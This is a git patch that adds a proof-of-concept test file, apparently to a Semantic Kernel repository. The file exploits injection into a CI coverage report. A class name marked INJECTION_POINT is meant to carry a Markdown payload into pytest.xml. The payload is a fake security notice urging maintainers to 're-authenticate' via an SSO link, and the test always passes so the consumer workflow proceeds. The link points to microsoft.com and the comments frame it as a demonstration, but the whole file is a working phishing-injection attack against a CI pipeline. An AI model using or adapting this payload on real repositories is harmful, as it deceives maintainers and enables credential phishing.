From e3b764812de506460607d0b5d31973a0de20b4cb Mon Sep 17 00:00:00 2001 From: yigolden Date: Fri, 24 Apr 2026 04:16:15 +0300 Subject: [PATCH] Create test_poc.py --- python/tests/unit/test_poc.py | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 python/tests/unit/test_poc.py diff --git a/python/tests/unit/test_poc.py b/python/tests/unit/test_poc.py new file mode 100644 index 000000000000..7cb0d370723d --- /dev/null +++ b/python/tests/unit/test_poc.py @@ -0,0 +1,24 @@ +import pytest + +# Neutral Markdown Payload for Demonstration +# We use microsoft.com to demonstrate the potential for phishing/social engineering +# without using malicious external links. +PAYLOAD = """ +# ⚠️ SECURITY NOTICE ⚠️ +Action Required: To maintain CI/CD integrity, please re-authenticate your session. +[Click here to verify your identity via Microsoft SSO](https://www.microsoft.com) +
+--- +*Automated security verification provided by Semantic Kernel CI/CD Pipeline* +""" + +class TestCoverage__INJECTION_POINT: + """ + The class name or test name is injected into the 'classname' attribute + of the generated pytest.xml file. + """ + @pytest.mark.parametrize("payload", [PAYLOAD]) + def test_coverage_report_injection(self, payload): + # This test always passes to ensure the workflow proceeds to the + # 'success' condition required by the consumer workflow. + assert True